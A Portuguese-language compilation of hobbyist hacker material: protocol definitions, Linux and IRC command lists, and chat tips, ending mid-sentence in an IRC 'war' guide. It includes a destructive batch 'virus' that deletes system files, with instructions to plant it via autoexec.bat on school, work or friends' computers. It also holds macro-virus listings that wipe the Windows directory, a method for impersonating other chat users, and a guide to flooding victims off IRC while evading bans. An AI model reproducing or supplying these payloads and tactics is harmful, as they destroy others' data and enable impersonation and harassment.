· Telnet : É um protocolo que permite o logon em máquinas remotas. Você passa a utilizar a máquina remota para realizar o processamento. No Windows NT existe o RAS (Remote Access Service, Serviço de Acesso Remoto) que tem os mesmos objetivos do Telnet.

· FTP : File Transfer Protocol (protocolo de transferência de arquivos), como o nome já diz é utilizado para a transferência de arquivos.

· HTTP: Hyper Text Transfer Protocol : É o protocolo utilizado pela Web, ele transmite textos, gráficos e qualquer outro tipo de arquivo (substituindo o FTP) além de permitir a navegação através de hiper texto.

Fasa seu virus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub

Comando basicos linux

ls = Lista os arquivos, mesmo que dir do DOS


* Atributos comuns:
* -a = mostra arquivos ocultos
* -l = mostra bytes, permissões, diretório, etc


Obs: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não precisam ter só 8 letras. Dai, se você quer listar os arquivos começados com u, por exemplo, peca ls u* e veja o resultado.
* substitui qualquer conjunto de caracteres
? substitui caracteres isolados
----------
rm = remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...


* Exemplo: rm look.doc / rm root.txt link.html win95.w95

----------
cp = copia arquivos, no formato: cp (arquivo1) (diretório)


* Exemplo: cp manual.txt /home/manual

----------
cat = mostra o conteúdo do arquivo, mesmo que o 'type' no DOS
----------
more = exibe o conteúdo de um arquivo pagina a pagina, mesmo q no DOS

* Exemplo: ls|more

----------
pwd = exibe o diretório atual (o que vc esta)
----------
rmdir = apaga diretório


* Exemplo: rmdir /diretório se o diretório estiver cheio, use o rm com o atributo -r

----------
mkdir = cria diretório


*

Exemplo: mkdir /diretório

----------
clear = limpa a tela, mesmo que 'cls' no DOS
----------
who = mostra quem está na maquina no momento
----------
whoami = mostra quem você e - útil quando você esquece com q login entrou... ;)
----------
finger = mostra o usuário associado a certa chave
----------
df = mostra o espaço usado, livre e a capacidade das partições do HD
----------
free = exibe a memória livre, a usada, e o buffers da memória RAM
----------
exit e logout = sai da sessão atual
----------
tar (tape archive) = programa de geração de backup
tar -c gera backup
tar -x restaura backup
tar -v lista cada arquivo processado
tar -t lista o conteúdo de um backup
----------

Nota: Para descompactar arquivos "tagged"(.tar.gz, .tgz, etc)
tar zxpvf (nome_do_arquivo)
Se o arquivo for "gziped"(.gz):
gunzip -d (nome_do_arquivo)

----------
chmod - muda as permissões do arquivo/diretório
chown - muda as permissões do arquivo/diretório
----------
awk - Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.
----------
bdiff - Compara dois arquivos grandes.
----------
bfs - Procura um arquivo grande.
----------
cal - Exibe um calendário.
----------
cat - Encadeia e imprimi arquivos.
----------
cc - Compilador C.
----------
cd - Muda diretório.
----------
chgrp - Muda o titulo de um grupo de arquivos.
----------
cmp - Compara dois arquivos; mostra a localização (linha e byte) da primeira diferença entre eles.
----------
comm - Compara dois arquivos para determinar quais linhas sao comuns entre eles.
----------
cu - Chamar outro sistema UNIX.
----------
date - Retorna a data e a hora.
----------
diff - Exibe as diferenças entre dois arquivos ou diretórios.
----------
diff3 - Exibe as diferenças entre tres arquivos ou diretorios.
----------
du - Relatorio no uso do sistema de arquivos.
----------
echo - Exibe seus argumentos.
----------
ed - Editor de texto.
----------
ex - Editor de texto.
----------
expr - Avalia seus argumentos quando geralmente e uma formula matematica.
----------
f77 - Compilador FORTRAN.
----------
find - Localiza os arquivos c/ caracteristicas especificas.
----------
format - Inicializa um floppy disk.
----------
grep - Procura um modelo a partir de um arquivo. (veja awk)
----------
help - :/ (ajuda)
----------
kill - Termina um processo.
----------
ln - Usado para unir arquivos.
----------
lpr - Copia um arquivo para a linha de impressora.
----------
ls - Exibe informacoes sobre um ou mais arquivos.
----------
mail - Usado para receber ou enviar e-mail.
----------
nroff - Usado para formatar textos.
----------
ps - Exibe um status dos processos.
----------
sleep - Causa um processo para tornar-se inativo por uma duracao de tempo especifica.
----------
sort - Escolher e unir um ou mais arquivos.
----------
spell - Procurar erros de ortografia num arquivo.
----------
split - Dividir um arquivo.
----------
stty - Exibir ou escolher parametros do terminal.
----------
tail - Exibir o fim de um arquivo.
----------
tset - Escolher o tipo de terminal.
----------
umask - Permite que o usuario especifique uma nova criacao de camuflagem.
----------
uniq - Compara dois arquivos. Procura e exibe em linhas o que e incomparavel em um arquivo.
----------
uucp - Execucao UNIX-para-UNIX
----------
vi - Editor de tela cheia.
----------
wc - Exibe detalhes no tamanho do arquivo.
----------
who - Informacoes de quem esta on-line.
----------
write - Usado para mandar mensagens para outro usuário.

Chat

Como clonar no chats

Muitos me perguntam como clonar no bate papo é claro...rs, a uol colocou um sistema que impede que as pessos
sejam clonadas, então oq eu faço uma combinação de codigos depois do nick da pessoa que força a entrada, mais na
lista de nicks o nick fica diferente a vantagem que na hora que vc envia a mensagem os codigos não aparecem então
passa por clonado...Chega de papo furado vamos lá, como fazer: coloque naonde vc coloca o nick normalmente o nick
da vitima mais esses caracteres coloque a cor e a careta se necessario...só vai dar certo se o nick mais esses
caracteres tiverem no maximo 35 caracteres...se vc colocar somente esses caracteres vc entra sem nick ... * Detalhe eu
só faço isso com o ChatNóia não sei se é possivel com o UolME, com certeza pelo site e com o jane não funciona...


Mensagem Colorida com ChatNóia

Para mandar mensagem colorida com o ChatNóia basta: segurar a tecla Ctrl e apertar a tecla k, vai aparecer uma
caixa de cores basta escolher uma, vai ficar assim +mais o numero referente a cor que você escolheu só que assim só
vai mudar o cor da letra para mandar o fundo da mensagem com cor você de colocar o  mais o numero da cor e o
numero do fundo dividido por , exemplo para mandar uma mensagem com fundo preto e letra branca deverá ficar
assim 0,1 o geito mais facil de colocar o quadrado é segurar a tecla Ctrl mais a tecla backspace.. * Detalhe somente
usuarios do ChatNoia que vem as mensagens coloridas os outros usuarios vem apenas os numeros...


Como usar o ChatNóia 0.92 e o 0.95

Como a uol vive mudando a entrada do bate papo muitos programas deixam de funcionar então surgem as novas
versões para corrigir o problema mais sempre els vem um pouco alterado no caso do ChatNoia 0.96 muita gente se
queixa, dizem que assim que entram no bate papo aparece uma mensagem desconectado do servidor, particularmente
a melhor versão do Noia foi o 0.92 mais chega de papo como usar o Noia 0.92 e o 0.95: faça o processo para entrar na
bate papo pela pagina da uol e abra o Noia e faça o mesmo quando pedir os caracteres para a entrada você vai usar
os que apareceram pela site e pronto * Detalhe você vai ter que ter uma sincronia se der muita diferença de tempo de
um para o outro não vai dar ai vc vai ter que carregar tudo denovo..



Caracteres Especiais

Bem com a tecla ALT esquerda apertada, vá no teclado de números , vulgarmente falando ... que se
localiza no canto direito do próprio e digite os seguintes números para cada respectivo caracter: OBS:
Solta o ALT quando você acabar de digitar o último número da sequência...

0140 - Œ 0138 - Š 0137 -‰ 0135 - ‡ 0134 - † 0131 - ƒ 0149 - o 00151 - - 0153 - ™ 0154 - š 0156 - œ 0157 - ? 0161 - ¡ 0162 - ¢
0163 - £ 0164 - ¤ 0165 - ¥ 0166 - ¦ 0167 - § 0169 - © 0171 - « 0176 - ° 0174 - ® 0177 - ± 0178 - ² 0179 - ³ 0181 - µ 0185 - ¹ 0186 - º
0187 - » 0188 - ¼ 0189 - ½ 0190 - ¾ 0191 - ¿ 0197 - Å 0198 - Æ 0200 - Ð 0215 - × 0216 - Ø 0229 - å 0230 - æ 0240 - ð 0247 - ÷
0248 - ø 0254 - þ - 0223-ß



Caracteres em HTML

☼-?_ض-?_♥-?_☺-? _▀-?_ ☻-? _▓-?

_▒-?_ ░-?_♂-?_█-? _▌-?_◄-?_►-?_ ♪-?



Mais códigos


♣ ♣
♦ ♦
♥ ♥
₪ ₪
₫ ₫
Č Č
č č
Ď Ď
ď ď
đ đ
ě ſ
  (espaço)
¹ ¹
» »
¼ ¼
½ ½
¾ ¾
¿ ¿
Å Å
Æ Æ
Ð Ð
× ×
Ø Ø
Þ Þ
ß ß
å å
æ æ
ð ð
÷ ÷
ø ø
þ þ
Ā Ā
ā ā
Ă Ă
ă ă
Ą Ą
ą ą
Ÿ Ÿ
  (cód. do ci)
¡ ¡
¢ ¢
£ £
¤ ¤
¥ ¥
¦
¦
§ §
¨ ¨
© ©
ª ª
« «
¬ ¬
® ®
¯ ¯
° °
± ±
² ²
³ ³
´ ´
µ µ
¶ ¶
· ·
¸ ¸
€ €
 
ƒ ƒ
„ „
… …
† †
‡ ‡
‰ ‰
Š Š
‹ ‹
Œ Œ
Ž Ž
‘ ‘
’ ’
“ “
” ”
• •
– –
— —
˜ ˜
™ ™
š š
› ›
œ œ
ž ž

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Quando você envia uma mensagem, ela se guia ao seu servidor de Net, depois ao servidor de irc em cujo qual você
esta conectado, deste, e enviada a todos os servidores de irc que estão conectados ao seu e então, cada um desses
servidores, re-envia a mensagens aos seus usuários que puderem ter acesso a mesma.

Comandos básicos:

1-Entrar em canal(join) ............. : /join #canal
2-Sair de um canal(part) ............ : /part #canal
3-Mandar uma mensagens privada ............ : /mensagens $nick $mensagens
4-Sair do IRC deixando mensagens .......... : /quit $mensagens
5-Conectar em um server de IRC ...... : /server $servidor
6-Abrir pvt com a pessoa ............ : /query $nick
7-Fazer um ‘action’ ................. : /me $mensagens
8-Kickar um usuario ................. : /kick #canal $nick $mensagens
9-Dar OP Status a alguem ............ : /mode #canal +o $nick
10-Listar os canais de um servidor .. : /list
11-Trocar seu nick .................. : /nick $new_nick
12-Trocar o topico .................. : /topic #canal $topic
13-Ver info dos usuários ............ : /whois $nick
14-Mandar mensagens = digitar normalmente . : /say $mensagens
15-Gerar beep ....................... : /beep $numero $vezes
16-Apagar texto de uma janela ....... : /clear
17-Fechar pvt ....................... : /closemsg $nick
18-Informacoes de um canal logado ... : /channel
19-Fechar cliente (soft) ............ : /exit
20-Help sobre cmd ................... : /help $cmd
21-Pede horario ao servidor ......... : /time
22-Sair de todos canais ............. : /join 0

Comandos avancados:

1-Banir por nick ................. : /mode #canal +b nick!*@*.*.*.*
2-Banir por user ................. : /mode #canal +b *!user@*.*.*.*
3-Banir por ip ................... : /mode #canal +b *!*@ip
4-DeOP usuario ................... : /mode #canal -o $nick
5-Dar KILL (so para IRCops) ...... : /kill $nick $mensagens
6-Ver usuários com mesmo IP ...... : /who $nick
7-Ver info de usuario que saiu ... : /whowas $nick
8-Ver todos os usuários c/ acesso a +W : /who 0 w
9-Ver todos os usuarios c/ acesso a +I : /who 0 i
10-Ver todos os usuarios c/ acesso a +S : /who 0 s
11-Ver todos os usuarios c/ acesso a +O : /who 0 o (ircops)
12-Dar um Ping ................... : /ctcp $nick Ping
13-Dar um Finger ................. : /ctcp $nick Finger
14-Convidar alguem a um canal .... : /invite $nick #canal
15-Ver todos os usuarios on-line . : /who
16-Se tornar IRCop ............... : /oper $nick $password
17-Enviar arquivo via DCC ........ : /dcc send $nick $file
18-Abrir DCC Chat ................ : /dcc chat $nick
19-Ver quem esta em um canal ..... : /names #canal
20-Ficar away .................... : /away $msg
21-Sair do away .................. : /away
22-Trazer o ultimo cmd na janela . : /
23-Ver a ultima linha digitada ... : /!
24-Tocar .wav .................... : /wavplay $file
25-Fazer um ‘action’ (= /me) ..... : /action $msg
26-Mandar ‘action’ p/ todos canais : /ame $msg
27-Mandar msg a todos canais ..... : /amsg $msg
28-Mandar um ctcp ................ : /ctcp $nick
29-Carregar .ini ................. : /add -apuce $file
Obs(29): opcoes: a (alias), p(popup), u(user), c(cmds), e(events)
30-Liga/desliga auto op .......... : /auto [on|off]
31-Auto-op a um usuario .......... : /auto $nick
32-Auto-op a um IP ............... : /auto $ip
33-Abilita grupo do ‘remote’ ..... : /enable #grupo
34-Desabilita grupo do ‘remote’ .. : /disable #grupo
35-Verifica se usuario esta na net : /finger email
36-Liga/desliga ‘fast-send’ do DCC : /fsend [on|off]
37-Trocar fonte de letra ......... : /font
38-Liga/desliga gravacao canal/pvt : /log [on|off]
39-Mandar msg (= /msg) ........... : /notice $nick $msg
40-Liga/desliga ignore ........... : /ignore [on|off]
41-Ignorar um nick ............... : /ignore $nick $tipo
42-Ignorar um IP ................. : /ignore $ip $tipo
Obs(41/42): tipo: ctcp, pvt, msg.
43-Mandar msgs aos ops ........... : /omsg #canal $msg
44-Mandar msgs aos ops (= /omsg) . : /onotice #canal $msg
45-Liga/desliga ‘protect mode’ ... : /protect [on|off]
46-Proteger usuario .............. : /protect $nick
47-Proteger IP ................... : /protect $ip
Obs(46/47): NaO usar protecao em canais registrados
48-Liga/desliga ‘events’ ......... : /events [on|off]
49-Liga/desliga ‘remote’ ......... : /remote [on|off]
50-Executar soft ................. : /run $soft $parametros
51-Enviar msg procedida de som ... : /sound #canal $file $msg
52-Usar ‘Monologue’ para falar msg : /speak $msg
53-Manda ‘action’ a canal ........ : /describe #canal $msg
54-Controle interno de flood ..... : /flood $linhas $intervalo $pausa
55-Fazer um ‘File SERVER’ ........ : /fserver $nick 10 $dir_inicial
56-Responder DCC Chat ............ : /creq [ask|auto|ignore]
Obs(56):Ask:ele pergunta, auto:aceita, ignore:ignora.
57-Procurar DNS por nick ......... : /dns $nick
58-Procurar DNS por IP ........... : /dns $ip
59-Mostrar texto para usuario .... : /echo $nick $canal $msg
60-Liga/desliga ‘notify list’ .... : /notify [on|off]
61-Carregar um arquivo na tela ... : /play [#canal/$nick] $file
Obs: O comando /play tem uma particularidade: ele tambem pode ser utilizado para carregar um arquivo formato texto e interpretar suas linhas como comandos, basta acrescentar -c e, para que uma linha somente seja utilizada
radomicamente, -r; exemplo: /play -c -r #canal/$nick $file
62-Da OP se ninguem der .......... : /pop $tempo #canal $nick
63-Enviar cmd RAW p/ o servidor .. : /raw $cmd
64-Salvar arquivo .ini ........... : /save $file.ini
65-Tipo de receber DCC ........... : /sreq [ask|auto|ignore]
Obs(65):ask:pergunta se recebe, auto:recebe automaticamente, ignore:ignora o DCC.
66-Ligar o timer ................. : /timer $N_timer &repeticoes $intervalo $comandos
67-Abre U-Central (= /whois)...... : /uwho $nick
68-Liga/desliga tela p/ ver URLs . : /url [on|off]
69-Acrescenta usuario na lista ... : /auser -a $nivel $nick
70-Acrescenta usuario por email .. : /auser -a $email
71-Mudar nivel ................... : /dlevel $nivel $nick
72-Remover nicks de um nivel ..... : /flush $nivel
73-Remover nicks (= /flush) ...... : /rlevel $nivel
74-Lista usuarios de um nivel .... : /ulis $nivel
75-Obter info dos servidores ..... : /info
76-Listar os IRCops .............. : /stats o $server
77-Listar as K-lines ............. : /stats k $server
78-Listar as portas .............. : /stats l
79-Ver os administradores ........ : /admin
80-Ver o numero de usuarios ...... : /lusers
81-Ver quais servidores linkados . : /links
82-Checar ‘Timers’ ligados ....... : /groups -e
83-MOTD .......................... : /motd



NOÇÕES PROFUNDAS:

1-Hackers: Utilizam o IRC para derrubar pessoas atraves de floods, utilizam também para trocar softs de interesse aos
mesmos;

2-Clones: Sao usuarios falsos utilizados pelos hackers para dar floods, podem ser detectados pelo IP, pois, possuem o
mesmo IP do hacker que o utiliza;

3-LAG: Pode ocorrer quando um hacker coloca muitos clones em um determinado canal, pois, o servidor tera que
re-enviar as msgs a uma maior quantidade de usuarios;

4-Flood: Ocorre quando um hacker tenta derrubar uma pessoa, se procede quando o hacker usa seus clones para
mandar repetidas msgs para uma determinada pessoa, como os clones sao muitos (nomalmente mais de 5) e a vitima,
somente 1, a vitima cai do servidor por flood, e os clones nao, porque cada um fez apenas um pouco de flood, a soma
desse flood e que ‘floode’ o usuario;

5-IRCops: Vc pode partir esse termo em 3: 1-IRC; 2-OP; 3-COP! Os IRCops sao os responsaveis pelo patrulhamento do
IRC, sao eles que podem dar Kill, entrar em canais com senha, se tornar op mesmo que alguem nao lhe passe esse
status, e o organizador, na hierarquia, encontra-se acima dos Ops, Bots e ate mesmo de alguns masters;

6-DCC: e por onde e possivel fazer a troca de arquivos, basta apenas enviar o arquivo e a pessoa aceitar (Get, Acept,
etc) o envio do mesmo;

7-Fserver: e como se vc estivesse no DOS do outro usuario, e um servico que lhe permite ver, copiar, transferir,
executar, deletar os arquivos do outro usuario, dependendo do seu nivel de acesso ao mesmo;

8-CTCP: e uma parte do Client-To-Client-Protocol (protocolo de transmissao cliente-cliente). Normalmente e utilizado
para conseguir informacoes sobre um usuario como nome real, email, soft cliente que voce esta utilizando. e utilizado
para fazer flood: Quando o cliente recebe um CTCP qualquer ele ira enviar a informacao solicitada, se for solicitada
muita informacao ao mesmo tempo, o servidor indicara que seu cliente esta fazendo flood e desconetara o mesmo;

9-Kill: e um comando especial, que somente pode ser dado por um IRCop ou por um servidor de IRC. e aplicado
quando um usuario comeca a usar clones, quando um usuario esta pertubando o servidor, e, o mais comum: quando
ocorre um netsplit e ocorre que dois usuarios utilizam o mesmo nick; Em um caso como o ultimo citado, quem estiver
com o nick a mais tempo permanece e o outro usuario levara Kill;

10-Conta Shell: Se constitui de um espaco (sub-diretorio) em disco no/do servidor. Costuma ser utilizada para a
colocacao de bots no IRC. A conta Shell permite o acesso ao sub-diretorio, mas, nao via acesso comum tipo DOS ou
Windows e sim pelo sistema Unix;

11-Split: Costuma ocorrer em conjunto com o netsplit; e quando muitos usuarios saem de um determinado canal.
Costuma-se dizer que o usuario ‘caiu’ quando isso acontece;

12-NetSplit: e a quebra de uma conexao entre dois servidores, quando isso ocorre, para um servidor, e como se todos
os outros usuarios se desconectassem do IRC.e detectavel: O usuario tem que setar o seu proprio modo para +s (/mode
$me +s), comando que server para receber mensagens do servidor; pronto, agora e so ficar prestando atencao no
status, quando chegar uma mensagem do servidor contendo o seguinte: ‘Net Break’ ou ‘Junction Break’ ou mesmo uma
mistura dessas duas mensagens, e a indicacao do rompimento de conexao de dois servidores, e o Netsplit ocorrendo;

13-Utilizacao de ‘|’: Essa ‘barra’ e utilizada para comandos complexos que teem que ser digitados de um so vez; a
funcao dela seria de emular ao programa de IRC que um comando foi digitado, enviado e outro foi enviado logo a
seguir. Exemplo: O usuario gostaria de entrarem um canal, tocar um arquivo .wav e sair do canal, entao, o comando
deveria ser esse:/join #canal | /wavplay #canal exemplo.wav | /part #canal Ou seja, ‘|’ serve para separar comandos.

----------------------------------------------------------------------

O BOT

Feitos pelos entendidos de IRC e por alguns hackers, tem a funcao de espionar um canal, dar OP ao seu criador,
proteger o criador e seus amigos, proteger canais, evitar flood, tirar clones e etc...

Um bot tambem tem suas ‘brincadeiras’, exmeplo: voce pode criar no bot uma info-line cuja qual o bot colocara no
canal toda vez que voce entrar no mesmo.

Abaixo, uma relacao de comandos para bots:

1./msg bot hello .................... : registra usuario em bot
2./msg bot pass ............. : cria uma senha para o usuario
3./msg bot ident ............ : faz o bot lhe reconhecer se estiver conectado ao IRC de forma diferente da cadastrada
4./msg bot email ............ : registra seu e-mail no bot
5./msg bot info .............. : cria uma info-line
6./msg bot info none ................ : apaga info-line
7./msg bot who ......... : o bot mostrara quem esta no canal que ele organiza e suas respectivas info-lines
8./msg bot who .............. : o bot enviara as informacoes disponiveis sobre o usuario
9./msg bot notes index ...... : mostra o indice das msgs guardadas no bot para vc
10./msg bot notes read # .... : o bot mostra a msg para voce de numero #
11./msg bot notes read all .. : mostra todas as msgs
12./msg bot notes erase # ... : apaga msg de numero #
13./msg bot notes erase all . : apaga todas as msgs
14./msg bot notes TO .. : envia/deixa uma msg a um usuario via bot
15./msg bot help .................... : para obter ajuda do bot
16./msg bot op ....... : para o bot dar op-status a um usuario; o mesmo tem que estar cadastrado como OP no bot, coisa
que so os masters podem fazer

Procedimentos: O indicado e que o usuario use dos comandos 1 ao 4, e 5, se quiser. E que o usuario se cadastre em
todos os BOTs de um servidor, principalmente os Bots daqueles canais que o usuario sempre costuma estar.

Master: e o dono do Bot ou um usuario autorizado; e quem programa e quem habilita/desabilita outros masters, ops,
area de arquivos e outros.

Linguagem: Costumam ser feitos em R.A.W., que e a programacao do IRC, quando Bots caseiros. Os Eggegrops Bots
sao feitos em Unix.

Diferenca: Caseiros: e um Bot de teste, feito em R.A.W. e colocado em uso quando o usuario se conecta ao IRC;

Egge: e um Bot trabalhado, feito em Unix, e colocado em uso pelo servidor ou usuario com conta Shell com
autorizacao e apoio dos mesmos.

DCC: Constitui-se da via direta de comunicacao Master-Bot, Usuario-Bot e Bot-Bot, serve para pegar arquivos na ‘area
de arquivos’, e para, principalmente, utilizar a ‘parity-line’ do bot para conversar (chat) com outros usuarios que
tambem estejam conectados ao bot.

----------------------------------------------------------------------

MODOS DE UM CANAL:

Um canal, ele tem que ter suas protecoes internas e automaticas, para nao depender somente dos ops e ircops. Esses
modos permitem ao canal, que ele seja privado (+p), invisivel (secreto)(+s), somente os Ops podem mudar o topico(+t),
nao recebera msgs de usuarios de fora do canal (+n), so’ entrarao usuarios chamados (invite) pelos ops (+i), podem ter
um numero limitado de usuarios (+l), ser um canal moderado, ou seja, so os Ops e quem tiver VOICE pode falar (+m) e
ate mesmo uma senha para vc entrar (+k)

Setando os modos de um canal:
1-Privado ........................... : /mode #canal +p
2-Secreto ........................... : /mode #canal +s
3-So OPs mudam o topico ............. : /mode #canal +t
4-Nao receber msgs de fora .......... : /mode #canal +n
5-So usuarios ‘invitados’ ........... : /mode #canal +i
6-Numero limitado de usuarios ....... : /mode #canal +l $num
7-Canal moderado .................... : /mode #canal +m
8-Canal com senha ................... : /mode #canal +k $senha
9-Tirar algum dos modos ............. : /mode #canal -modo_escolhido

----------------------------------------------------------------------

MODOS DO USUARIO:

Esses modos do usuario sao mais para protecao; ele pode ficar invisivel ao servidor, pode receber as msgs do servidor,
cujas quais indicam quando um servidor caiu ou tentou reconctar, ver as ‘Walls-OPs’, ou seja, as msgs enviadas de Ops
e Ircops a outros Ops ou IRCops. E ate mesmo dar VOICE a um usuario em um canal.

Setando os modos de um usuario:
1-Invisivel .................... : /mode $nick +i
2-Server msgs .................. : /mode $nick +s
3-Wall-ops ..................... : /mode $nick +w
4-Voice ........................ : /mode #canal +v $nick

----------------------------------------------------------------------

OUTRAS DEFINICOES

Take Over: Tambem conhecido como ‘Take Down’; e a tomada de um canal por um usuario.Como proceder para tomar
um canal: Deve-se setar os modos do usuario para receber as mensagens do servidor. Quando houver uma ‘quebra’ de
conexao, o usuario devera se conectar ao servidor que desconectou-se e entrar no canal desejado, que,
provavelmente, nao tera um unico sequer usuario, tornando-se assim, Operador. Quando o servidor reconectar-se a
rede, o usuario precisa apenas tirar o OP-Status dos Operadores pela outra conexao. Como evitar: Quando ocorrer uma
‘quebra’ de conexao, o Operador de canal deve estar atento para retirar o OP-Status de todos os Operadores assim
logados no servidor que desconectou-se.

Emocticons: Sao os simbolos do IRC, atraves dos quais vc pode expressar sue estado/sentimento sobre algo. Sao
comumente utilizados em mails. Os principais: (Nesta pagina existe uma secao especial repleta com mais de 100
emoticons)

:) ................................ : Alegre
:( ................................ : Triste
:~( ............................... : Chorando
:`( ............................... : Chorando (2)
:~) ............................... : Emocionado
;) ................................ : Piscando
:* ................................ : Beijo
:*) ............................... : Cheiro
}:-{ .............................. : P. da vida
q:^P .............................. : Bone e com a lingua de fora
:P ................................ : Sorrindo
:O ................................ : Impressionado
:| ................................ : Sem comentarios
:X ................................ : Cala a boca; calado

----------------------------------------------------------------------

SRIPTS:

Os scripts sao um conjunto de comandos que disponibilam alguns recursos, como por exemplo: derrubar os outros por
flood, controlar um canal automaticamente como se fosse um bot ou um usuario dedicado ao mesmo, podem servidor
para derrubar, gerenciando os clones a fim de que eles executem a ordem estabelecida pelo script, pode ignorar
automaticamente alguem que esteja tentando lhe derrubar, pode usar o recurso de protecao do IRC, pode espionar um
canal, pode bisbilhotar um pvt. Enfim, pode tudo o que existe no IRC. Depende apenas de como for feito e a
necessidade dessa pessoa de controle de IRC.

1-O que sao: Sao um conjunto de comandos com funcoes especificas e que ganham pode trabalhando em conjunto;

2-Como fazer: Basta entender de IRC e ter paciencia de fazer algo que lhe interesse a ponto suficiente de montar seu
proprio script;

3-Quem faz: Quem tem paciencia e/ou que necessita de um script especifico ou com algum caracteristica nao
encontrada em outro script;

4-Os melhores disponiveis: Vai depender de cada um, eu particularmente, aprecio o Dusk para protecao e para
ataque/defesa em conjunto, prefiro o Nahrck, o Dusk e bom, e tambem o Smart Nark, recomendo para os inciantes o
Avalanche Script, pegue em http://surf.to/avscript

----------------------------------------------------------------------

DDE:

1-O que e? DDE e o Intercambio Dinamico dos Dados (Dynamic Data Exchange), e um dos 3 mecanismos de
comunicacao entre processos suportados dentro do Windows. Os outros dois sao a Area de Transferencia e a memoria
compartilhada nas bibliotecas de ligacao dinamica. O DDE esta baseado no sistema de mensagem embutido no
Windows. Dois programas Windows ‘dialogam’entre si enviando mensagens de um para o outro. Esses dois programa
sao conhecidos como ‘servidor’ e ‘cliente’. O Serdivor de DDE e’ o programa que tem acesso aos dados que poderao
ser uteis a outros programas Windows. O Cliente do DDE e’ o programa que obtem esses dados do servidor.

2-Qual a utilizacao de DDE? O DDE e' muito usado com bots/clones... tipo: quando eu colocar um frase, os outros clones
executariam o que estao programados para fazer.

-----------------------------------------------------------------------



Guerra Básica

Essa seção é dedicada àqueles que são novos na guerra em IRC. Esse texto vai lhes ensinar as bases do flood e colisão
de nick, incluindo alguns tópicos que você verá adiante.


1. Flood

Essa é uma antiga, elegante e efetiva maneira de pegar quem você odeia. O que o flood faz com que a vítima mande
muita informação para um servidor, que desconecta ela. Para tal são necessários clones. Clones são outras conexões
com o servidor. Copias do seu IRC client. O flood script, manda os clones enviarem muita informação simultaneamente
para a pessoa. Quando o IRC client dele tenta processar essa informação, manda muitos dados para o servidor, que
desconecta ela.

Existem muitos tipos de floods, escolher o certo é importante. Bons Flood são os DCC e CTCP. Os que não fazem nada
são os Text, Notice e Invite floods. Bem como os Crap floods que não fazem nada mas fazem parecer. Outro fator
importante é números de clones que você vai usar. Para dar flood em uma única pessoa, a melhor aposta que você
pode fazer são 3 clones CTCP em floods como Clientinfo, Userinfo ou Version. ECHO floods são extremamente
poderosos, porém requerem mais clones. DCC floods são muito efetivos também. Existem 4 tipos de DCC flood
diferentes. São eles: DCC Chat flood, que manda toneladas de janelas de DCC chat para a pessoa; DCC send flood,
manda toneladas de DCC send (Se os DCCs forem aceitos automaticamente pode-se encher o HD do condenado de
arquivos desagradáveis; DCC Resume e Accept são outros dois tipos. Esses últimos foram a melhor forma de flood
encontrada, mas IRC clients não os suportam mais, tornando eles fúteis.

Quando for usar clones ou fazer floods você deve ter cuidado para não ser pego. Isso acarretaria em um K-line. Para
prevenir que isso aconteça, lembre: Não use clones se não for absolutamente necessário, por que arriscar? Destrua
seus clones quando o objetivo for alcançado; Use "nick changing" clones pra dar flood. Todos sabem sobre o /whois
para ver informações da pessoa, mas a maioria não sabe sobre o /whowas. Assim, se o clone mudar de nome depois
do flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em canais com IRCops ou Network admins! Isso,
certamente, vai lhe custará um K-line. Se for possível, faça o flood junto de um amigo, quanto menos clones por IP
menor a chance de você ser pego.



2. Colisão de Nicks

A colisão de Nicks ocorre quando duas pessoas estão usando o mesmo nick. Como os servidores não podem suportar
isso, as pessoas são desconectadas. Existem dois tipos de colisão de Nicks. A colisão por split server e a por lag. A por
split server acontece quando você põe um bot dentro do splited server, com o nick da pessoa que você quer matar. No
netmerge, as duas morrem. Esse método não funciona na undernet. O outro método é chamado de colisão por lag. Esse
só pode ser feito quando a pessoa muda de nick. O que acontece é isso: 1. O Lamer muda de nick. 2. O script vê e
